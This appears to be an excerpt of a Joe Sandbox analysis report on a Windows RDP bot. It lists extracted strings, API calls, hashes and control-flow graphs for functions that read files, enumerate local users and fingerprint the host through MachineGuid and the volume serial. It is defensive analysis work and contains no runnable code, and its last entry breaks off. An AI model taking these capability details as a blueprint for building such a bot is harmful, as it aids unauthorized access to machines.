                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                  • API String ID: 1094913617-243243391
                  • Opcode ID: 45364a4d73fc9ddfc2e4dec663ea98f65a876d62473df77d3cc6ffd341dc3089
                  • Instruction ID: 27f929965639c9b54e04159cc8a4ee8039380fb3ed303c4f89a2f1510f7b11da
                  • Opcode Fuzzy Hash: 45364a4d73fc9ddfc2e4dec663ea98f65a876d62473df77d3cc6ffd341dc3089
                  • Instruction Fuzzy Hash: 3E611925E0D753C6FB217624A4443B8A290AF0239DFF401B6EA5EDB2D0DF2CAD459271
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                  • API String ID: 4253334766-243243391
                  • Opcode ID: 349a579f1b544f04e1e00aaff86d8b417e05fac2448ab09d3faaddd37a340f33
                  • Instruction ID: 171c73539827c5e436fc8f15e25721d1347df5744232bc976b6042d857590928
                  • Opcode Fuzzy Hash: 349a579f1b544f04e1e00aaff86d8b417e05fac2448ab09d3faaddd37a340f33
                  • Instruction Fuzzy Hash: 61617D61F0CE8391FB219BD7A4403BD2A5A6F513B4F4411BADC6E5B2F4DF2CA9458381
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
                  • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                  • API String ID: 1361071942-3382179125
                  • Opcode ID: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
                  • Instruction ID: dc138e19946267911f03a8b187d85b881c0a002bc9e3293308c104569fd147ad
                  • Opcode Fuzzy Hash: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
                  • Instruction Fuzzy Hash: 5661B422A0C60795FA209B54F8403BD6361AFC5B54F640137D9EE076F2EE3EE889C311
                  APIs
                  • strcmp.MSVCRT ref: 00007FF76A908C62
                  • strcmp.MSVCRT ref: 00007FF76A908C75
                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF76A908CB1
                  • _read.MSVCRT ref: 00007FF76A908D07
                  • GetLastError.KERNEL32 ref: 00007FF76A908D26
                    • Part of subcall function 00007FF76A9088EE: FreeLibrary.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A90892F
                    • Part of subcall function 00007FF76A9088EE: GetProcessHeap.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908962
                    • Part of subcall function 00007FF76A9088EE: HeapFree.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908973
                    • Part of subcall function 00007FF76A9089AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF76A908CE3,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A9089DB
                    • Part of subcall function 00007FF76A9089AA: HeapFree.KERNEL32(?,?,00000000,00007FF76A908CE3,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A9089EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                  • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                  • API String ID: 3617873859-308889057
                  • Opcode ID: 4e7bd165b9ef87f01e60badb3280077771b19ad4178e97b239a804a1478b891e
                  • Instruction ID: 647be376d933ad978a5b4ab7a8058a81f79dd2244146a468cf540c37e8a36ca2
                  • Opcode Fuzzy Hash: 4e7bd165b9ef87f01e60badb3280077771b19ad4178e97b239a804a1478b891e
                  • Instruction Fuzzy Hash: 89510711F0C703C5FB687724A480379F2A0AF183C4FF495BAD94EC62A2EE5DE9848631
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                  • String ID:
                  • API String ID: 3714283218-0
                  • Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                  • Instruction ID: 44276b773091d4bd8e86b2263386fa34bb21b2211f10d483262918f8b195a78a
                  • Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                  • Instruction Fuzzy Hash: BF513C61A08706C9FB56FB15E890279B3A1AF49BC8FB484B9D90DC7391DE3CE8408770
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLastrecv
                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                  • API String ID: 2514157807-65069805
                  • Opcode ID: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
                  • Instruction ID: cbae33de8d995b60b1cfc85d3e752cc0a42534c24a4539ffcac5814cd261a32d
                  • Opcode Fuzzy Hash: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
                  • Instruction Fuzzy Hash: 44115E60E0C51792F6205729AD402B913516F45BF4F919333DCFD9AAF7EEACA946C300

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 7ff76a902515-7ff76a902531 1 7ff76a9025c7-7ff76a9025f5 call 7ff76a9099e2 0->1 2 7ff76a902537-7ff76a90253a 0->2 10 7ff76a902722-7ff76a902733 1->10 3 7ff76a902540-7ff76a902544 2->3 4 7ff76a9025fa-7ff76a902628 call 7ff76a9099e2 2->4 8 7ff76a902546-7ff76a90254a 3->8 9 7ff76a902550-7ff76a902565 fopen 3->9 4->10 8->9 12 7ff76a90262d-7ff76a90265b call 7ff76a9099e2 8->12 13 7ff76a902660-7ff76a902689 _errno call 7ff76a9099e2 _errno 9->13 14 7ff76a90256b-7ff76a902580 fseek 9->14 15 7ff76a902735 10->15 16 7ff76a90273c-7ff76a902749 10->16 12->10 29 7ff76a9026c0-7ff76a9026d4 _errno 13->29 30 7ff76a90268b-7ff76a902698 13->30 19 7ff76a902586-7ff76a9025af _errno call 7ff76a9099e2 _errno 14->19 20 7ff76a902778-7ff76a902785 call 7ff76a90e478 14->20 15->16 21 7ff76a90274f-7ff76a902760 call 7ff76a9099e2 16->21 22 7ff76a902abb 16->22 36 7ff76a9025b5-7ff76a9025c2 19->36 37 7ff76a9026f9-7ff76a902707 _errno 19->37 34 7ff76a9027b0-7ff76a9027d9 _errno call 7ff76a9099e2 _errno 20->34 35 7ff76a902787 20->35 32 7ff76a902765-7ff76a902777 21->32 33 7ff76a902ac7-7ff76a902ae0 call 7ff76a9099e2 22->33 38 7ff76a90270d-7ff76a902710 29->38 30->29 33->32 49 7ff76a90281f-7ff76a902833 _errno 34->49 50 7ff76a9027db-7ff76a9027e8 34->50 40 7ff76a902a9d-7ff76a902aa2 35->40 41 7ff76a90278d-7ff76a902792 35->41 36->1 37->38 43 7ff76a902712-7ff76a902715 fclose 38->43 44 7ff76a90271a-7ff76a90271c 38->44 40->38 47 7ff76a902838-7ff76a902850 fseek 41->47 48 7ff76a902798-7ff76a90279d 41->48 43->44 44->10 44->33 51 7ff76a902852-7ff76a90285e 47->51 52 7ff76a90287a-7ff76a9028a3 _errno call 7ff76a9099e2 _errno 47->52 48->47 53 7ff76a9027a3-7ff76a9027ab 48->53 49->38 50->49 54 7ff76a902864-7ff76a90286a 51->54 55 7ff76a902902-7ff76a902924 GetProcessHeap HeapAlloc 51->55 63 7ff76a9028a5-7ff76a9028b2 52->63 64 7ff76a9028e9-7ff76a9028fd _errno 52->64 53->38 57 7ff76a902ab1-7ff76a902ab6 54->57 58 7ff76a902870-7ff76a902875 54->58 55->54 60 7ff76a90292a-7ff76a902940 call 7ff76a9099e2 55->60 57->38 62 7ff76a9029b9-7ff76a9029c8 58->62 60->54 66 7ff76a902a05-7ff76a902a0e 62->66 67 7ff76a9029ca-7ff76a9029cc 62->67 63->64 64->38 68 7ff76a902a10-7ff76a902a12 66->68 69 7ff76a902a3d-7ff76a902a60 call 7ff76a9099e2 66->69 67->66 70 7ff76a9029ce-7ff76a9029f1 fread 67->70 71 7ff76a902a14-7ff76a902a19 68->71 72 7ff76a902a62-7ff76a902a67 68->72 69->71 70->66 73 7ff76a9029f3 70->73 71->38 77 7ff76a902a1f-7ff76a902a38 GetProcessHeap HeapFree 71->77 75 7ff76a902a74-7ff76a902a7d 72->75 76 7ff76a902a69-7ff76a902a6f 72->76 78 7ff76a902945-7ff76a90296e _errno call 7ff76a9099e2 _errno 73->78 79 7ff76a9029f9-7ff76a9029fc 73->79 75->76 76->38 77->38 83 7ff76a9029a5-7ff76a9029b3 _errno 78->83 84 7ff76a902970-7ff76a90297d 78->84 79->62 83->62 84->83
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$fclosefflushfopenfseekfwrite
                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                  • API String ID: 2897271634-4162578512
                  • Opcode ID: c5b2ae9a7948dd11bc5867709e5fa9ad82dc7d4ef6c1d40c0db95260f6b92eb8
                  • Instruction ID: 307acb7001d81d5046b3ef84ec3f515fc634a569c3ffccb58e60e641c529840a
                  • Opcode Fuzzy Hash: c5b2ae9a7948dd11bc5867709e5fa9ad82dc7d4ef6c1d40c0db95260f6b92eb8
                  • Instruction Fuzzy Hash: C2D16C65A09703C5FB22BB15E8803B9A751AF547C4FF540BADA1DC72A4EE3DE945C320

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 281 7ffe11503420-7ffe1150343a call 7ffe11509ff4 284 7ffe11503952 281->284 285 7ffe11503440-7ffe11503455 call 7ffe11509f73 281->285 288 7ffe11503966-7ffe1150396b 284->288 289 7ffe115034ab 285->289 290 7ffe11503457-7ffe11503485 285->290 291 7ffe115034bd-7ffe115034d4 call 7ffe11501292 288->291 292 7ffe115034b0-7ffe115034bb FreeLibrary 289->292 297 7ffe11503487-7ffe1150348c 290->297 298 7ffe1150348e-7ffe115034a9 call 7ffe11501292 290->298 296 7ffe115034d9-7ffe115034e6 291->296 292->291 295 7ffe115034e7-7ffe11503520 GetNativeSystemInfo GetWindowsDirectoryA 292->295 299 7ffe11503526-7ffe11503547 GetLastError call 7ffe11501292 295->299 300 7ffe115035fe-7ffe11503621 call 7ffe11501292 295->300 297->292 298->292 307 7ffe11503549 299->307 308 7ffe11503567-7ffe1150356d 299->308 300->291 309 7ffe11503627-7ffe1150365d call 7ffe11508702 300->309 310 7ffe1150355d-7ffe11503562 307->310 311 7ffe1150354b-7ffe11503558 307->311 308->288 313 7ffe11503573-7ffe11503579 308->313 317 7ffe11503663-7ffe11503665 309->317 318 7ffe1150370e-7ffe1150372a call 7ffe11501292 309->318 310->291 311->310 315 7ffe1150357b-7ffe1150357e 313->315 316 7ffe115035b2-7ffe115035b8 313->316 319 7ffe1150359c-7ffe115035a2 315->319 320 7ffe11503580-7ffe11503583 315->320 321 7ffe1150398e-7ffe11503993 316->321 322 7ffe115035be-7ffe115035c4 316->322 317->291 324 7ffe1150366b-7ffe115036c8 GetVolumeInformationA 317->324 333 7ffe1150372f 318->333 327 7ffe115035a8-7ffe115035ad 319->327 328 7ffe11503984-7ffe11503989 319->328 325 7ffe11503589-7ffe1150358c 320->325 326 7ffe11503970-7ffe11503975 320->326 321->291 329 7ffe115035ca-7ffe115035d0 322->329 330 7ffe11503998-7ffe1150399d 322->330 334 7ffe115037cb-7ffe115037fd call 7ffe11501292 324->334 335 7ffe115036ce-7ffe115036f4 GetLastError call 7ffe11501292 324->335 336 7ffe1150397a-7ffe1150397f 325->336 337 7ffe11503592-7ffe11503597 325->337 326->291 327->291 328->291 331 7ffe115035d6-7ffe115035db 329->331 332 7ffe115039a2-7ffe115039a7 329->332 330->291 331->291 332->291 333->317 342 7ffe11503811-7ffe11503818 334->342 343 7ffe115037ff-7ffe1150380b strlen 334->343 344 7ffe115036f6 335->344 345 7ffe11503734-7ffe1150373a 335->345 336->291 337->291 349 7ffe1150381c-7ffe11503879 call 7ffe11501292 342->349 343->342 346 7ffe115038d3-7ffe115038d7 343->346 350 7ffe115036fc-7ffe11503709 344->350 351 7ffe11503883-7ffe11503888 344->351 347 7ffe11503897-7ffe1150389c 345->347 348 7ffe11503740 345->348 346->342 355 7ffe115038dd-7ffe115038e1 346->355 347->291 352 7ffe11503779-7ffe1150377f 348->352 353 7ffe11503742-7ffe11503745 348->353 359 7ffe1150387e 349->359 350->318 351->291 360 7ffe11503785-7ffe1150378b 352->360 361 7ffe115038bf-7ffe115038c4 352->361 357 7ffe11503747-7ffe1150374a 353->357 358 7ffe11503763-7ffe11503769 353->358 355->342 356 7ffe115038e7-7ffe1150391a _errno call 7ffe11511118 _errno 355->356 374 7ffe1150391c-7ffe1150391f 356->374 375 7ffe1150392a-7ffe1150394d _errno call 7ffe11501292 356->375 363 7ffe115038a1-7ffe115038a6 357->363 364 7ffe11503750-7ffe11503753 357->364 365 7ffe115038b5-7ffe115038ba 358->365 366 7ffe1150376f-7ffe11503774 358->366 359->296 367 7ffe115038c9-7ffe115038ce 360->367 368 7ffe11503791-7ffe11503797 360->368 361->291 363->291 370 7ffe115038ab-7ffe115038b0 364->370 371 7ffe11503759-7ffe1150375e 364->371 365->291 366->291 367->291 372 7ffe11503799-7ffe1150379e 368->372 373 7ffe115037a3-7ffe115037a8 368->373 370->291 371->291 372->291 373->291 374->349 376 7ffe11503925 374->376 375->342 376->342
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                  • API String ID: 3828489143-883582248
                  • Opcode ID: a7b22198e87da04587ca094f872e11ebe662094dbe01be4df64eb0879e3e46c0
                  • Instruction ID: d2b23216f7d607feb4b3a7590ca51b7246e9a03f9a577a839e7dfc23a7fefadb
                  • Opcode Fuzzy Hash: a7b22198e87da04587ca094f872e11ebe662094dbe01be4df64eb0879e3e46c0
                  • Instruction Fuzzy Hash: 94D19065E0CE0385F7628B97E4443BE2769AF41770F1540FAC95E072B6DF2DE9848381

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 183 7ffe0eb4e870-7ffe0eb4e88a call 7ffe0eb41aa4 186 7ffe0eb4eda2 183->186 187 7ffe0eb4e890-7ffe0eb4e8a5 call 7ffe0eb41a23 183->187 189 7ffe0eb4edb6-7ffe0eb4edbb 186->189 192 7ffe0eb4e8fb 187->192 193 7ffe0eb4e8a7-7ffe0eb4e8d5 187->193 191 7ffe0eb4e90d-7ffe0eb4e924 call 7ffe0eb41292 189->191 197 7ffe0eb4e929-7ffe0eb4e936 191->197 195 7ffe0eb4e900-7ffe0eb4e90b FreeLibrary 192->195 201 7ffe0eb4e8de-7ffe0eb4e8f9 call 7ffe0eb41292 193->201 202 7ffe0eb4e8d7-7ffe0eb4e8dc 193->202 195->191 196 7ffe0eb4e937-7ffe0eb4e970 GetNativeSystemInfo GetWindowsDirectoryA 195->196 199 7ffe0eb4ea4e-7ffe0eb4ea71 call 7ffe0eb41292 196->199 200 7ffe0eb4e976-7ffe0eb4e997 GetLastError call 7ffe0eb41292 196->200 199->191 211 7ffe0eb4ea77-7ffe0eb4eaad call 7ffe0eb42472 199->211 209 7ffe0eb4e9b7-7ffe0eb4e9bd 200->209 210 7ffe0eb4e999 200->210 201->195 202->195 209->189 215 7ffe0eb4e9c3-7ffe0eb4e9c9 209->215 212 7ffe0eb4e99b-7ffe0eb4e9a8 210->212 213 7ffe0eb4e9ad-7ffe0eb4e9b2 210->213 221 7ffe0eb4eab3-7ffe0eb4eab5 211->221 222 7ffe0eb4eb5e-7ffe0eb4eb7a call 7ffe0eb41292 211->222 212->213 213->191 217 7ffe0eb4ea02-7ffe0eb4ea08 215->217 218 7ffe0eb4e9cb-7ffe0eb4e9ce 215->218 219 7ffe0eb4edde-7ffe0eb4ede3 217->219 220 7ffe0eb4ea0e-7ffe0eb4ea14 217->220 223 7ffe0eb4e9d0-7ffe0eb4e9d3 218->223 224 7ffe0eb4e9ec-7ffe0eb4e9f2 218->224 219->191 227 7ffe0eb4ea1a-7ffe0eb4ea20 220->227 228 7ffe0eb4ede8-7ffe0eb4eded 220->228 221->191 230 7ffe0eb4eabb-7ffe0eb4eb18 GetVolumeInformationA 221->230 237 7ffe0eb4eb7f 222->237 231 7ffe0eb4edc0-7ffe0eb4edc5 223->231 232 7ffe0eb4e9d9-7ffe0eb4e9dc 223->232 225 7ffe0eb4edd4-7ffe0eb4edd9 224->225 226 7ffe0eb4e9f8-7ffe0eb4e9fd 224->226 225->191 226->191 235 7ffe0eb4edf2-7ffe0eb4edf7 227->235 236 7ffe0eb4ea26-7ffe0eb4ea2b 227->236 228->191 238 7ffe0eb4eb1e-7ffe0eb4eb44 GetLastError call 7ffe0eb41292 230->238 239 7ffe0eb4ec1b-7ffe0eb4ec4d call 7ffe0eb41292 230->239 231->191 233 7ffe0eb4e9e2-7ffe0eb4e9e7 232->233 234 7ffe0eb4edca-7ffe0eb4edcf 232->234 233->191 234->191 235->191 236->191 237->221 244 7ffe0eb4eb84-7ffe0eb4eb8a 238->244 245 7ffe0eb4eb46 238->245 246 7ffe0eb4ec4f-7ffe0eb4ec5b strlen 239->246 247 7ffe0eb4ec61-7ffe0eb4ec68 239->247 250 7ffe0eb4eb90 244->250 251 7ffe0eb4ece7-7ffe0eb4ecec 244->251 248 7ffe0eb4ecd3-7ffe0eb4ecd8 245->248 249 7ffe0eb4eb4c-7ffe0eb4eb59 245->249 246->247 252 7ffe0eb4ed23-7ffe0eb4ed27 246->252 253 7ffe0eb4ec6c-7ffe0eb4ecc9 call 7ffe0eb41292 247->253 248->191 249->222 255 7ffe0eb4eb92-7ffe0eb4eb95 250->255 256 7ffe0eb4ebc9-7ffe0eb4ebcf 250->256 251->191 252->247 254 7ffe0eb4ed2d-7ffe0eb4ed31 252->254 263 7ffe0eb4ecce 253->263 254->247 260 7ffe0eb4ed37-7ffe0eb4ed6a _errno call 7ffe0eb546f0 _errno 254->260 261 7ffe0eb4ebb3-7ffe0eb4ebb9 255->261 262 7ffe0eb4eb97-7ffe0eb4eb9a 255->262 258 7ffe0eb4ebd5-7ffe0eb4ebdb 256->258 259 7ffe0eb4ed0f-7ffe0eb4ed14 256->259 264 7ffe0eb4ebe1-7ffe0eb4ebe7 258->264 265 7ffe0eb4ed19-7ffe0eb4ed1e 258->265 259->191 276 7ffe0eb4ed7a-7ffe0eb4ed9d _errno call 7ffe0eb41292 260->276 277 7ffe0eb4ed6c-7ffe0eb4ed6f 260->277 269 7ffe0eb4ed05-7ffe0eb4ed0a 261->269 270 7ffe0eb4ebbf-7ffe0eb4ebc4 261->270 267 7ffe0eb4eba0-7ffe0eb4eba3 262->267 268 7ffe0eb4ecf1-7ffe0eb4ecf6 262->268 263->197 271 7ffe0eb4ebf3-7ffe0eb4ebf8 264->271 272 7ffe0eb4ebe9-7ffe0eb4ebee 264->272 265->191 274 7ffe0eb4ecfb-7ffe0eb4ed00 267->274 275 7ffe0eb4eba9-7ffe0eb4ebae 267->275 268->191 269->191 270->191 271->191 272->191 274->191 275->191 276->247 277->253 278 7ffe0eb4ed75 277->278 278->247
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                  • API String ID: 3828489143-883582248
                  • Opcode ID: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
                  • Instruction ID: 2daa8c33c53abfb9cf2336bf25d7de92785300d82188a89b5bacee11b40c1ee2
